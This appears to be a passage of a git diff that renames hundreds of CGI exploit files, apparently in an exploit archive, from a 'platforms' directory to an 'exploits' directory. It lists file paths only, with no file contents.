rename from platforms/cgi/remote/211.c rename to exploits/cgi/remote/211.c diff --git a/platforms/cgi/remote/21102.txt b/exploits/cgi/remote/21102.txt similarity index 100% rename from platforms/cgi/remote/21102.txt rename to exploits/cgi/remote/21102.txt diff --git a/platforms/cgi/remote/21104.pl b/exploits/cgi/remote/21104.pl similarity index 100% rename from platforms/cgi/remote/21104.pl rename to exploits/cgi/remote/21104.pl diff --git a/platforms/cgi/remote/21125.pl b/exploits/cgi/remote/21125.pl similarity index 100% rename from platforms/cgi/remote/21125.pl rename to exploits/cgi/remote/21125.pl diff --git a/platforms/cgi/remote/21129.java b/exploits/cgi/remote/21129.java similarity index 100% rename from platforms/cgi/remote/21129.java rename to exploits/cgi/remote/21129.java diff --git a/platforms/cgi/remote/21183.txt b/exploits/cgi/remote/21183.txt similarity index 100% rename from platforms/cgi/remote/21183.txt rename to exploits/cgi/remote/21183.txt diff --git a/platforms/cgi/remote/21194.txt b/exploits/cgi/remote/21194.txt similarity index 100% rename from platforms/cgi/remote/21194.txt rename to exploits/cgi/remote/21194.txt diff --git a/platforms/cgi/remote/21249.txt b/exploits/cgi/remote/21249.txt similarity index 100% rename from platforms/cgi/remote/21249.txt rename to exploits/cgi/remote/21249.txt diff --git a/platforms/cgi/remote/21263.txt b/exploits/cgi/remote/21263.txt similarity index 100% rename from platforms/cgi/remote/21263.txt rename to exploits/cgi/remote/21263.txt diff --git a/platforms/cgi/remote/21287.pl b/exploits/cgi/remote/21287.pl similarity index 100% rename from platforms/cgi/remote/21287.pl rename to exploits/cgi/remote/21287.pl diff --git a/platforms/cgi/remote/21340.pl b/exploits/cgi/remote/21340.pl similarity index 100% rename from platforms/cgi/remote/21340.pl rename to exploits/cgi/remote/21340.pl diff --git a/platforms/cgi/remote/21354.txt b/exploits/cgi/remote/21354.txt similarity index 100% rename from platforms/cgi/remote/21354.txt rename to exploits/cgi/remote/21354.txt diff --git a/platforms/cgi/remote/21390.txt b/exploits/cgi/remote/21390.txt similarity index 100% rename from platforms/cgi/remote/21390.txt rename to exploits/cgi/remote/21390.txt diff --git a/platforms/cgi/remote/21415.txt b/exploits/cgi/remote/21415.txt similarity index 100% rename from platforms/cgi/remote/21415.txt rename to exploits/cgi/remote/21415.txt diff --git a/platforms/cgi/remote/21641.txt b/exploits/cgi/remote/21641.txt similarity index 100% rename from platforms/cgi/remote/21641.txt rename to exploits/cgi/remote/21641.txt diff --git a/platforms/cgi/remote/21642.txt b/exploits/cgi/remote/21642.txt similarity index 100% rename from platforms/cgi/remote/21642.txt rename to exploits/cgi/remote/21642.txt diff --git a/platforms/cgi/remote/22000.txt b/exploits/cgi/remote/22000.txt similarity index 100% rename from platforms/cgi/remote/22000.txt rename to exploits/cgi/remote/22000.txt diff --git a/platforms/cgi/remote/22054.c b/exploits/cgi/remote/22054.c similarity index 100% rename from platforms/cgi/remote/22054.c rename to exploits/cgi/remote/22054.c diff --git a/platforms/cgi/remote/22311.txt b/exploits/cgi/remote/22311.txt similarity index 100% rename from platforms/cgi/remote/22311.txt rename to exploits/cgi/remote/22311.txt diff --git a/platforms/cgi/remote/22312.txt b/exploits/cgi/remote/22312.txt similarity index 100% rename from platforms/cgi/remote/22312.txt rename to exploits/cgi/remote/22312.txt diff --git a/platforms/cgi/remote/22355.txt b/exploits/cgi/remote/22355.txt similarity index 100% rename from platforms/cgi/remote/22355.txt rename to exploits/cgi/remote/22355.txt diff --git a/platforms/cgi/remote/22541.txt b/exploits/cgi/remote/22541.txt similarity index 100% rename from platforms/cgi/remote/22541.txt rename to exploits/cgi/remote/22541.txt diff --git a/platforms/cgi/remote/22542.txt b/exploits/cgi/remote/22542.txt similarity index 100% rename from platforms/cgi/remote/22542.txt rename to exploits/cgi/remote/22542.txt diff --git a/platforms/cgi/remote/22753.pl b/exploits/cgi/remote/22753.pl similarity index 100% rename from platforms/cgi/remote/22753.pl rename to exploits/cgi/remote/22753.pl diff --git a/platforms/cgi/remote/22754.pl b/exploits/cgi/remote/22754.pl similarity index 100% rename from platforms/cgi/remote/22754.pl rename to exploits/cgi/remote/22754.pl diff --git a/platforms/cgi/remote/23187.txt b/exploits/cgi/remote/23187.txt similarity index 100% rename from platforms/cgi/remote/23187.txt rename to exploits/cgi/remote/23187.txt diff --git a/platforms/cgi/remote/23304.txt b/exploits/cgi/remote/23304.txt similarity index 100% rename from platforms/cgi/remote/23304.txt rename to exploits/cgi/remote/23304.txt diff --git a/platforms/cgi/remote/23312.txt b/exploits/cgi/remote/23312.txt similarity index 100% rename from platforms/cgi/remote/23312.txt rename to exploits/cgi/remote/23312.txt diff --git a/platforms/cgi/remote/23582.txt b/exploits/cgi/remote/23582.txt similarity index 100% rename from platforms/cgi/remote/23582.txt rename to exploits/cgi/remote/23582.txt diff --git a/platforms/cgi/remote/23804.txt b/exploits/cgi/remote/23804.txt similarity index 100% rename from platforms/cgi/remote/23804.txt rename to exploits/cgi/remote/23804.txt diff --git a/platforms/cgi/remote/23987.txt b/exploits/cgi/remote/23987.txt similarity index 100% rename from platforms/cgi/remote/23987.txt rename to exploits/cgi/remote/23987.txt diff --git a/platforms/cgi/remote/24326.txt b/exploits/cgi/remote/24326.txt similarity index 100% rename from platforms/cgi/remote/24326.txt rename to exploits/cgi/remote/24326.txt diff --git a/platforms/cgi/remote/24327.txt b/exploits/cgi/remote/24327.txt similarity index 100% rename from platforms/cgi/remote/24327.txt rename to exploits/cgi/remote/24327.txt diff --git a/platforms/cgi/remote/24336.txt b/exploits/cgi/remote/24336.txt similarity index 100% rename from platforms/cgi/remote/24336.txt rename to exploits/cgi/remote/24336.txt diff --git a/platforms/cgi/remote/24337.txt b/exploits/cgi/remote/24337.txt similarity index 100% rename from platforms/cgi/remote/24337.txt rename to exploits/cgi/remote/24337.txt diff --git a/platforms/cgi/remote/24342.txt b/exploits/cgi/remote/24342.txt similarity index 100% rename from platforms/cgi/remote/24342.txt rename to exploits/cgi/remote/24342.txt diff --git a/platforms/cgi/remote/25648.txt b/exploits/cgi/remote/25648.txt similarity index 100% rename from platforms/cgi/remote/25648.txt rename to exploits/cgi/remote/25648.txt diff --git a/platforms/cgi/remote/26768.txt b/exploits/cgi/remote/26768.txt similarity index 100% rename from platforms/cgi/remote/26768.txt rename to exploits/cgi/remote/26768.txt diff --git a/platforms/cgi/remote/32962.txt b/exploits/cgi/remote/32962.txt similarity index 100% rename from platforms/cgi/remote/32962.txt rename to exploits/cgi/remote/32962.txt diff --git a/platforms/cgi/remote/33051.txt b/exploits/cgi/remote/33051.txt similarity index 100% rename from platforms/cgi/remote/33051.txt rename to exploits/cgi/remote/33051.txt diff --git a/platforms/cgi/remote/34777.rb b/exploits/cgi/remote/34777.rb similarity index 100% rename from platforms/cgi/remote/34777.rb rename to exploits/cgi/remote/34777.rb diff --git a/platforms/cgi/remote/36045.txt b/exploits/cgi/remote/36045.txt similarity index 100% rename from platforms/cgi/remote/36045.txt rename to exploits/cgi/remote/36045.txt diff --git a/platforms/cgi/remote/37426.py b/exploits/cgi/remote/37426.py similarity index 100% rename from platforms/cgi/remote/37426.py rename to exploits/cgi/remote/37426.py diff --git a/platforms/cgi/remote/37428.txt b/exploits/cgi/remote/37428.txt similarity index 100% rename from platforms/cgi/remote/37428.txt rename to exploits/cgi/remote/37428.txt diff --git a/platforms/cgi/remote/38849.rb b/exploits/cgi/remote/38849.rb similarity index 100% rename from platforms/cgi/remote/38849.rb rename to exploits/cgi/remote/38849.rb diff --git a/platforms/cgi/remote/39074.txt b/exploits/cgi/remote/39074.txt similarity index 100% rename from platforms/cgi/remote/39074.txt rename to exploits/cgi/remote/39074.txt diff --git a/platforms/cgi/remote/39917.rb b/exploits/cgi/remote/39917.rb similarity index 100% rename from platforms/cgi/remote/39917.rb rename to exploits/cgi/remote/39917.rb diff --git a/platforms/cgi/remote/39918.rb b/exploits/cgi/remote/39918.rb similarity index 100% rename from platforms/cgi/remote/39918.rb rename to exploits/cgi/remote/39918.rb diff --git a/platforms/cgi/remote/40949.rb b/exploits/cgi/remote/40949.rb similarity index 100% rename from platforms/cgi/remote/40949.rb rename to exploits/cgi/remote/40949.rb diff --git a/platforms/cgi/remote/41598.rb b/exploits/cgi/remote/41598.rb similarity index 100% rename from platforms/cgi/remote/41598.rb rename to exploits/cgi/remote/41598.rb diff --git a/platforms/cgi/remote/42257.rb b/exploits/cgi/remote/42257.rb similarity index 100% rename from platforms/cgi/remote/42257.rb rename to exploits/cgi/remote/42257.rb diff --git a/platforms/cgi/remote/42369.rb b/exploits/cgi/remote/42369.rb similarity index 100% rename from platforms/cgi/remote/42369.rb rename to exploits/cgi/remote/42369.rb diff --git a/platforms/cgi/webapps/10031.rb b/exploits/cgi/webapps/10031.rb similarity index 100% rename from platforms/cgi/webapps/10031.rb rename to exploits/cgi/webapps/10031.rb diff --git a/platforms/cgi/webapps/1004.php b/exploits/cgi/webapps/1004.php similarity index 100% rename from platforms/cgi/webapps/1004.php rename to exploits/cgi/webapps/1004.php diff --git a/platforms/cgi/webapps/1005.pl b/exploits/cgi/webapps/1005.pl similarity index 100% rename from platforms/cgi/webapps/1005.pl rename to exploits/cgi/webapps/1005.pl diff --git a/platforms/cgi/webapps/1039.pl b/exploits/cgi/webapps/1039.pl similarity index 100% rename from platforms/cgi/webapps/1039.pl rename to exploits/cgi/webapps/1039.pl diff --git a/platforms/cgi/webapps/1040.c b/exploits/cgi/webapps/1040.c similarity index 100% rename from platforms/cgi/webapps/1040.c rename to exploits/cgi/webapps/1040.c diff --git a/platforms/cgi/webapps/1041.pl b/exploits/cgi/webapps/1041.pl similarity index 100% rename from platforms/cgi/webapps/1041.pl rename to exploits/cgi/webapps/1041.pl diff --git a/platforms/cgi/webapps/1048.pl b/exploits/cgi/webapps/1048.pl similarity index 100% rename from platforms/cgi/webapps/1048.pl rename to exploits/cgi/webapps/1048.pl diff --git a/platforms/cgi/webapps/1120.pl b/exploits/cgi/webapps/1120.pl similarity index 100% rename from platforms/cgi/webapps/1120.pl rename to exploits/cgi/webapps/1120.pl diff --git a/platforms/cgi/webapps/11723.pl b/exploits/cgi/webapps/11723.pl similarity index 100% rename from platforms/cgi/webapps/11723.pl rename to exploits/cgi/webapps/11723.pl diff --git a/platforms/cgi/webapps/11823.txt b/exploits/cgi/webapps/11823.txt similarity index 100% rename from platforms/cgi/webapps/11823.txt rename to exploits/cgi/webapps/11823.txt diff --git a/platforms/cgi/webapps/1194.c b/exploits/cgi/webapps/1194.c similarity index 100% rename from platforms/cgi/webapps/1194.c rename to exploits/cgi/webapps/1194.c diff --git a/platforms/cgi/webapps/1236.pm b/exploits/cgi/webapps/1236.pm similarity index 100% rename from platforms/cgi/webapps/1236.pm rename to exploits/cgi/webapps/1236.pm diff --git a/platforms/cgi/webapps/12433.py b/exploits/cgi/webapps/12433.py similarity index 100% rename from platforms/cgi/webapps/12433.py rename to exploits/cgi/webapps/12433.py diff --git a/platforms/cgi/webapps/12434.py b/exploits/cgi/webapps/12434.py similarity index 100% rename from platforms/cgi/webapps/12434.py rename to exploits/cgi/webapps/12434.py diff --git a/platforms/cgi/webapps/1471.pl b/exploits/cgi/webapps/1471.pl similarity index 100% rename from platforms/cgi/webapps/1471.pl rename to exploits/cgi/webapps/1471.pl diff --git a/platforms/cgi/webapps/1508.pl b/exploits/cgi/webapps/1508.pl similarity index 100% rename from platforms/cgi/webapps/1508.pl rename to exploits/cgi/webapps/1508.pl diff --git a/platforms/cgi/webapps/15130.sh b/exploits/cgi/webapps/15130.sh similarity index 100% rename from platforms/cgi/webapps/15130.sh rename to exploits/cgi/webapps/15130.sh diff --git a/platforms/cgi/webapps/15625.txt b/exploits/cgi/webapps/15625.txt similarity index 100% rename from platforms/cgi/webapps/15625.txt rename to exploits/cgi/webapps/15625.txt diff --git a/platforms/cgi/webapps/15737.txt b/exploits/cgi/webapps/15737.txt similarity index 100% rename from platforms/cgi/webapps/15737.txt rename to exploits/cgi/webapps/15737.txt diff --git a/platforms/cgi/webapps/15744.txt b/exploits/cgi/webapps/15744.txt similarity index 100% rename from platforms/cgi/webapps/15744.txt rename to exploits/cgi/webapps/15744.txt diff --git a/platforms/cgi/webapps/15807.txt b/exploits/cgi/webapps/15807.txt similarity index 100% rename from platforms/cgi/webapps/15807.txt rename to exploits/cgi/webapps/15807.txt diff --git a/platforms/cgi/webapps/15987.py b/exploits/cgi/webapps/15987.py similarity index 100% rename from platforms/cgi/webapps/15987.py rename to exploits/cgi/webapps/15987.py diff --git a/platforms/cgi/webapps/16006.html b/exploits/cgi/webapps/16006.html similarity index 100% rename from platforms/cgi/webapps/16006.html rename to exploits/cgi/webapps/16006.html diff --git a/platforms/cgi/webapps/1669.pl b/exploits/cgi/webapps/1669.pl similarity index 100% rename from platforms/cgi/webapps/1669.pl rename to exploits/cgi/webapps/1669.pl diff --git a/platforms/cgi/webapps/1670.pl b/exploits/cgi/webapps/1670.pl similarity index 100% rename from platforms/cgi/webapps/1670.pl rename to exploits/cgi/webapps/1670.pl diff --git a/platforms/cgi/webapps/1677.php b/exploits/cgi/webapps/1677.php similarity index 100% rename from platforms/cgi/webapps/1677.php rename to exploits/cgi/webapps/1677.php diff --git a/platforms/cgi/webapps/1680.pm b/exploits/cgi/webapps/1680.pm similarity index 100% rename from platforms/cgi/webapps/1680.pm rename to exploits/cgi/webapps/1680.pm diff --git a/platforms/cgi/webapps/16856.rb b/exploits/cgi/webapps/16856.rb similarity index 100% rename from platforms/cgi/webapps/16856.rb rename to exploits/cgi/webapps/16856.rb diff --git a/platforms/cgi/webapps/16857.rb b/exploits/cgi/webapps/16857.rb similarity index 100% rename from platforms/cgi/webapps/16857.rb rename to exploits/cgi/webapps/16857.rb diff --git a/platforms/cgi/webapps/16886.rb b/exploits/cgi/webapps/16886.rb similarity index 100% rename from platforms/cgi/webapps/16886.rb rename to exploits/cgi/webapps/16886.rb diff --git a/platforms/cgi/webapps/16891.rb b/exploits/cgi/webapps/16891.rb similarity index 100% rename from platforms/cgi/webapps/16891.rb rename to exploits/cgi/webapps/16891.rb diff --git a/platforms/cgi/webapps/16893.rb b/exploits/cgi/webapps/16893.rb similarity index 100% rename from platforms/cgi/webapps/16893.rb rename to exploits/cgi/webapps/16893.rb diff --git a/platforms/cgi/webapps/16905.rb b/exploits/cgi/webapps/16905.rb similarity index 100% rename from platforms/cgi/webapps/16905.rb rename to exploits/cgi/webapps/16905.rb diff --git a/platforms/cgi/webapps/16908.rb b/exploits/cgi/webapps/16908.rb similarity index 100% rename from platforms/cgi/webapps/16908.rb rename to exploits/cgi/webapps/16908.rb diff --git a/platforms/cgi/webapps/16914.rb b/exploits/cgi/webapps/16914.rb similarity index 100% rename from platforms/cgi/webapps/16914.rb rename to exploits/cgi/webapps/16914.rb diff --git a/platforms/cgi/webapps/17259.txt b/exploits/cgi/webapps/17259.txt similarity index 100% rename from platforms/cgi/webapps/17259.txt rename to exploits/cgi/webapps/17259.txt diff --git a/platforms/cgi/webapps/17443.txt b/exploits/cgi/webapps/17443.txt similarity index 100% rename from platforms/cgi/webapps/17443.txt rename to exploits/cgi/webapps/17443.txt diff --git a/platforms/cgi/webapps/1755.py b/exploits/cgi/webapps/1755.py similarity index 100% rename from platforms/cgi/webapps/1755.py rename to exploits/cgi/webapps/1755.py diff --git a/platforms/cgi/webapps/17577.txt b/exploits/cgi/webapps/17577.txt similarity index 100% rename from platforms/cgi/webapps/17577.txt rename to exploits/cgi/webapps/17577.txt diff --git a/platforms/cgi/webapps/17653.txt b/exploits/cgi/webapps/17653.txt similarity index 100% rename from platforms/cgi/webapps/17653.txt rename to exploits/cgi/webapps/17653.txt diff --git a/platforms/cgi/webapps/177.pl b/exploits/cgi/webapps/177.pl similarity index 100% rename from platforms/cgi/webapps/177.pl rename to exploits/cgi/webapps/177.pl diff --git a/platforms/cgi/webapps/179.c b/exploits/cgi/webapps/179.c similarity index 100% rename from platforms/cgi/webapps/179.c rename to exploits/cgi/webapps/179.c diff --git a/platforms/cgi/webapps/17922.rb b/exploits/cgi/webapps/17922.rb similarity index 100% rename from platforms/cgi/webapps/17922.rb rename to exploits/cgi/webapps/17922.rb diff --git a/platforms/cgi/webapps/18153.txt b/exploits/cgi/webapps/18153.txt similarity index 100% rename from platforms/cgi/webapps/18153.txt rename to exploits/cgi/webapps/18153.txt diff --git a/platforms/cgi/webapps/18582.txt b/exploits/cgi/webapps/18582.txt similarity index 100% rename from platforms/cgi/webapps/18582.txt rename to exploits/cgi/webapps/18582.txt diff --git a/platforms/cgi/webapps/187.pl b/exploits/cgi/webapps/187.pl similarity index 100% rename from platforms/cgi/webapps/187.pl rename to exploits/cgi/webapps/187.pl diff --git a/platforms/cgi/webapps/18722.txt b/exploits/cgi/webapps/18722.txt similarity index 100% rename from platforms/cgi/webapps/18722.txt rename to exploits/cgi/webapps/18722.txt diff --git a/platforms/cgi/webapps/188.pl b/exploits/cgi/webapps/188.pl similarity index 100% rename from platforms/cgi/webapps/188.pl rename to exploits/cgi/webapps/188.pl diff --git a/platforms/cgi/webapps/18824.txt b/exploits/cgi/webapps/18824.txt similarity index 100% rename from platforms/cgi/webapps/18824.txt rename to exploits/cgi/webapps/18824.txt diff --git a/platforms/cgi/webapps/18841.txt b/exploits/cgi/webapps/18841.txt similarity index 100% rename from platforms/cgi/webapps/18841.txt rename to exploits/cgi/webapps/18841.txt diff --git a/platforms/cgi/webapps/20712.rb b/exploits/cgi/webapps/20712.rb similarity index 100% rename from platforms/cgi/webapps/20712.rb rename to exploits/cgi/webapps/20712.rb diff --git a/platforms/cgi/webapps/21184.txt b/exploits/cgi/webapps/21184.txt similarity index 100% rename from platforms/cgi/webapps/21184.txt rename to exploits/cgi/webapps/21184.txt diff --git a/platforms/cgi/webapps/21187.txt b/exploits/cgi/webapps/21187.txt similarity index 100% rename from platforms/cgi/webapps/21187.txt rename to exploits/cgi/webapps/21187.txt diff --git a/platforms/cgi/webapps/21208.txt b/exploits/cgi/webapps/21208.txt similarity index 100% rename from platforms/cgi/webapps/21208.txt rename to exploits/cgi/webapps/21208.txt diff --git a/platforms/cgi/webapps/21209.txt b/exploits/cgi/webapps/21209.txt similarity index 100% rename from platforms/cgi/webapps/21209.txt rename to exploits/cgi/webapps/21209.txt diff --git a/platforms/cgi/webapps/21257.txt b/exploits/cgi/webapps/21257.txt similarity index 100% rename from platforms/cgi/webapps/21257.txt rename to exploits/cgi/webapps/21257.txt diff --git a/platforms/cgi/webapps/21352.txt b/exploits/cgi/webapps/21352.txt similarity index 100% rename from platforms/cgi/webapps/21352.txt rename to exploits/cgi/webapps/21352.txt diff --git a/platforms/cgi/webapps/21374.txt b/exploits/cgi/webapps/21374.txt similarity index 100% rename from platforms/cgi/webapps/21374.txt rename to exploits/cgi/webapps/21374.txt diff --git a/platforms/cgi/webapps/21405.txt b/exploits/cgi/webapps/21405.txt similarity index 100% rename from platforms/cgi/webapps/21405.txt rename to exploits/cgi/webapps/21405.txt diff --git a/platforms/cgi/webapps/21406.txt b/exploits/cgi/webapps/21406.txt similarity index 100% rename from platforms/cgi/webapps/21406.txt rename to exploits/cgi/webapps/21406.txt diff --git a/platforms/cgi/webapps/21411.txt b/exploits/cgi/webapps/21411.txt similarity index 100% rename from platforms/cgi/webapps/21411.txt rename to exploits/cgi/webapps/21411.txt diff --git a/platforms/cgi/webapps/21433.txt b/exploits/cgi/webapps/21433.txt similarity index 100% rename from platforms/cgi/webapps/21433.txt rename to exploits/cgi/webapps/21433.txt diff --git a/platforms/cgi/webapps/21435.txt b/exploits/cgi/webapps/21435.txt similarity index 100% rename from platforms/cgi/webapps/21435.txt rename to exploits/cgi/webapps/21435.txt diff --git a/platforms/cgi/webapps/21460.pl b/exploits/cgi/webapps/21460.pl similarity index 100% rename from platforms/cgi/webapps/21460.pl rename to exploits/cgi/webapps/21460.pl diff --git a/platforms/cgi/webapps/21473.txt b/exploits/cgi/webapps/21473.txt similarity index 100% rename from platforms/cgi/webapps/21473.txt rename to exploits/cgi/webapps/21473.txt diff --git a/platforms/cgi/webapps/21480.txt b/exploits/cgi/webapps/21480.txt similarity index 100% rename from platforms/cgi/webapps/21480.txt rename to exploits/cgi/webapps/21480.txt diff --git a/platforms/cgi/webapps/21487.pl b/exploits/cgi/webapps/21487.pl similarity index 100% rename from platforms/cgi/webapps/21487.pl rename to exploits/cgi/webapps/21487.pl diff --git a/platforms/cgi/webapps/21494.txt b/exploits/cgi/webapps/21494.txt similarity index 100% rename from platforms/cgi/webapps/21494.txt rename to exploits/cgi/webapps/21494.txt diff --git a/platforms/cgi/webapps/21495.txt b/exploits/cgi/webapps/21495.txt similarity index 100% rename from platforms/cgi/webapps/21495.txt rename to exploits/cgi/webapps/21495.txt diff --git a/platforms/cgi/webapps/21532.txt b/exploits/cgi/webapps/21532.txt similarity index 100% rename from platforms/cgi/webapps/21532.txt rename to exploits/cgi/webapps/21532.txt diff --git a/platforms/cgi/webapps/21533.txt b/exploits/cgi/webapps/21533.txt similarity index 100% rename from platforms/cgi/webapps/21533.txt rename to exploits/cgi/webapps/21533.txt diff --git a/platforms/cgi/webapps/21535.txt b/exploits/cgi/webapps/21535.txt similarity index 100% rename from platforms/cgi/webapps/21535.txt rename to exploits/cgi/webapps/21535.txt diff --git a/platforms/cgi/webapps/21553.txt b/exploits/cgi/webapps/21553.txt similarity index 100% rename from platforms/cgi/webapps/21553.txt rename to exploits/cgi/webapps/21553.txt diff --git a/platforms/cgi/webapps/21558.txt b/exploits/cgi/webapps/21558.txt similarity index 100% rename from platforms/cgi/webapps/21558.txt rename to exploits/cgi/webapps/21558.txt diff --git a/platforms/cgi/webapps/21567.pl b/exploits/cgi/webapps/21567.pl similarity index 100% rename from platforms/cgi/webapps/21567.pl rename to exploits/cgi/webapps/21567.pl diff --git a/platforms/cgi/webapps/21573.txt b/exploits/cgi/webapps/21573.txt similarity index 100% rename from platforms/cgi/webapps/21573.txt rename to exploits/cgi/webapps/21573.txt diff --git a/platforms/cgi/webapps/21587.txt b/exploits/cgi/webapps/21587.txt similarity index 100% rename from platforms/cgi/webapps/21587.txt rename to exploits/cgi/webapps/21587.txt diff --git a/platforms/cgi/webapps/21588.txt b/exploits/cgi/webapps/21588.txt similarity index 100% rename from platforms/cgi/webapps/21588.txt rename to exploits/cgi/webapps/21588.txt diff --git a/platforms/cgi/webapps/21609.txt b/exploits/cgi/webapps/21609.txt similarity index 100% rename from platforms/cgi/webapps/21609.txt rename to exploits/cgi/webapps/21609.txt diff --git a/platforms/cgi/webapps/21617.txt b/exploits/cgi/webapps/21617.txt similarity index 100% rename from platforms/cgi/webapps/21617.txt rename to exploits/cgi/webapps/21617.txt diff --git a/platforms/cgi/webapps/21658.html b/exploits/cgi/webapps/21658.html similarity index 100% rename from platforms/cgi/webapps/21658.html rename to exploits/cgi/webapps/21658.html diff --git a/platforms/cgi/webapps/21659.html b/exploits/cgi/webapps/21659.html similarity index 100% rename from platforms/cgi/webapps/21659.html rename to exploits/cgi/webapps/21659.html diff --git a/platforms/cgi/webapps/21679.txt b/exploits/cgi/webapps/21679.txt similarity index 100% rename from platforms/cgi/webapps/21679.txt rename to exploits/cgi/webapps/21679.txt diff --git a/platforms/cgi/webapps/21728.txt b/exploits/cgi/webapps/21728.txt similarity index 100% rename from platforms/cgi/webapps/21728.txt rename to exploits/cgi/webapps/21728.txt diff --git a/platforms/cgi/webapps/21729.txt b/exploits/cgi/webapps/21729.txt similarity index 100% rename from platforms/cgi/webapps/21729.txt rename to exploits/cgi/webapps/21729.txt diff --git a/platforms/cgi/webapps/21730.txt b/exploits/cgi/webapps/21730.txt similarity index 100% rename from platforms/cgi/webapps/21730.txt rename to exploits/cgi/webapps/21730.txt diff --git a/platforms/cgi/webapps/21768.txt b/exploits/cgi/webapps/21768.txt similarity index 100% rename from platforms/cgi/webapps/21768.txt rename to exploits/cgi/webapps/21768.txt diff --git a/platforms/cgi/webapps/21769.txt b/exploits/cgi/webapps/21769.txt similarity index 100% rename from platforms/cgi/webapps/21769.txt rename to exploits/cgi/webapps/21769.txt diff --git a/platforms/cgi/webapps/21802.txt b/exploits/cgi/webapps/21802.txt similarity index 100% rename from platforms/cgi/webapps/21802.txt rename to exploits/cgi/webapps/21802.txt diff --git a/platforms/cgi/webapps/21877.txt b/exploits/cgi/webapps/21877.txt similarity index 100% rename from platforms/cgi/webapps/21877.txt rename to exploits/cgi/webapps/21877.txt diff --git a/platforms/cgi/webapps/21878.txt b/exploits/cgi/webapps/21878.txt similarity index 100% rename from platforms/cgi/webapps/21878.txt rename to exploits/cgi/webapps/21878.txt diff --git a/platforms/cgi/webapps/21895.txt b/exploits/cgi/webapps/21895.txt similarity index 100% rename from platforms/cgi/webapps/21895.txt rename to exploits/cgi/webapps/21895.txt diff --git a/platforms/cgi/webapps/21926.txt b/exploits/cgi/webapps/21926.txt similarity index 100% rename from platforms/cgi/webapps/21926.txt rename to exploits/cgi/webapps/21926.txt diff --git a/platforms/cgi/webapps/21962.txt b/exploits/cgi/webapps/21962.txt similarity index 100% rename from platforms/cgi/webapps/21962.txt rename to exploits/cgi/webapps/21962.txt diff --git a/platforms/cgi/webapps/21966.txt b/exploits/cgi/webapps/21966.txt similarity index 100% rename from platforms/cgi/webapps/21966.txt rename to exploits/cgi/webapps/21966.txt diff --git a/platforms/cgi/webapps/21979.txt b/exploits/cgi/webapps/21979.txt similarity index 100% rename from platforms/cgi/webapps/21979.txt rename to exploits/cgi/webapps/21979.txt diff --git a/platforms/cgi/webapps/21995.txt b/exploits/cgi/webapps/21995.txt similarity index 100% rename from platforms/cgi/webapps/21995.txt rename to exploits/cgi/webapps/21995.txt diff --git a/platforms/cgi/webapps/22015.txt b/exploits/cgi/webapps/22015.txt similarity index 100% rename from platforms/cgi/webapps/22015.txt rename to exploits/cgi/webapps/22015.txt diff --git a/platforms/cgi/webapps/22045.txt b/exploits/cgi/webapps/22045.txt similarity index 100% rename from platforms/cgi/webapps/22045.txt rename to exploits/cgi/webapps/22045.txt diff --git a/platforms/cgi/webapps/22050.txt b/exploits/cgi/webapps/22050.txt similarity index 100% rename from platforms/cgi/webapps/22050.txt rename to exploits/cgi/webapps/22050.txt diff --git a/platforms/cgi/webapps/22051.txt b/exploits/cgi/webapps/22051.txt similarity index 100% rename from platforms/cgi/webapps/22051.txt rename to exploits/cgi/webapps/22051.txt diff --git a/platforms/cgi/webapps/22052.txt b/exploits/cgi/webapps/22052.txt similarity index 100% rename from platforms/cgi/webapps/22052.txt rename to exploits/cgi/webapps/22052.txt diff --git a/platforms/cgi/webapps/22111.pl b/exploits/cgi/webapps/22111.pl similarity index 100% rename from platforms/cgi/webapps/22111.pl rename to exploits/cgi/webapps/22111.pl diff --git a/platforms/cgi/webapps/22137.txt b/exploits/cgi/webapps/22137.txt similarity index 100% rename from platforms/cgi/webapps/22137.txt rename to exploits/cgi/webapps/22137.txt diff --git a/platforms/cgi/webapps/22169.pl b/exploits/cgi/webapps/22169.pl similarity index 100% rename from platforms/cgi/webapps/22169.pl rename to exploits/cgi/webapps/22169.pl diff --git a/platforms/cgi/webapps/22170.pl b/exploits/cgi/webapps/22170.pl similarity index 100% rename from platforms/cgi/webapps/22170.pl rename to exploits/cgi/webapps/22170.pl diff --git a/platforms/cgi/webapps/22198.txt b/exploits/cgi/webapps/22198.txt similarity index 100% rename from platforms/cgi/webapps/22198.txt rename to exploits/cgi/webapps/22198.txt diff --git a/platforms/cgi/webapps/22199.txt b/exploits/cgi/webapps/22199.txt similarity index 100% rename from platforms/cgi/webapps/22199.txt rename to exploits/cgi/webapps/22199.txt diff --git a/platforms/cgi/webapps/22204.txt b/exploits/cgi/webapps/22204.txt similarity index 100% rename from platforms/cgi/webapps/22204.txt rename to exploits/cgi/webapps/22204.txt diff --git a/platforms/cgi/webapps/22227.txt b/exploits/cgi/webapps/22227.txt similarity index 100% rename from platforms/cgi/webapps/22227.txt rename to exploits/cgi/webapps/22227.txt diff --git a/platforms/cgi/webapps/22228.txt b/exploits/cgi/webapps/22228.txt similarity index 100% rename from platforms/cgi/webapps/22228.txt rename to exploits/cgi/webapps/22228.txt diff --git a/platforms/cgi/webapps/22260.c b/exploits/cgi/webapps/22260.c similarity index 100% rename from platforms/cgi/webapps/22260.c rename to exploits/cgi/webapps/22260.c diff --git a/platforms/cgi/webapps/22261.pl b/exploits/cgi/webapps/22261.pl similarity index 100% rename from platforms/cgi/webapps/22261.pl rename to exploits/cgi/webapps/22261.pl diff --git a/platforms/cgi/webapps/22262.pl b/exploits/cgi/webapps/22262.pl similarity index 100% rename from platforms/cgi/webapps/22262.pl rename to exploits/cgi/webapps/22262.pl diff --git a/platforms/cgi/webapps/22263.pl b/exploits/cgi/webapps/22263.pl similarity index 100% rename from platforms/cgi/webapps/22263.pl rename to exploits/cgi/webapps/22263.pl diff --git a/platforms/cgi/webapps/22337.txt b/exploits/cgi/webapps/22337.txt similarity index 100% rename from platforms/cgi/webapps/22337.txt rename to exploits/cgi/webapps/22337.txt diff --git a/platforms/cgi/webapps/22364.c b/exploits/cgi/webapps/22364.c similarity index 100% rename from platforms/cgi/webapps/22364.c rename to exploits/cgi/webapps/22364.c diff --git a/platforms/cgi/webapps/22377.txt b/exploits/cgi/webapps/22377.txt similarity index 100% rename from platforms/cgi/webapps/22377.txt rename to exploits/cgi/webapps/22377.txt diff --git a/platforms/cgi/webapps/22380.pl b/exploits/cgi/webapps/22380.pl similarity index 100% rename from platforms/cgi/webapps/22380.pl rename to exploits/cgi/webapps/22380.pl diff --git a/platforms/cgi/webapps/22408.txt b/exploits/cgi/webapps/22408.txt similarity index 100% rename from platforms/cgi/webapps/22408.txt rename to exploits/cgi/webapps/22408.txt diff --git a/platforms/cgi/webapps/22481.txt 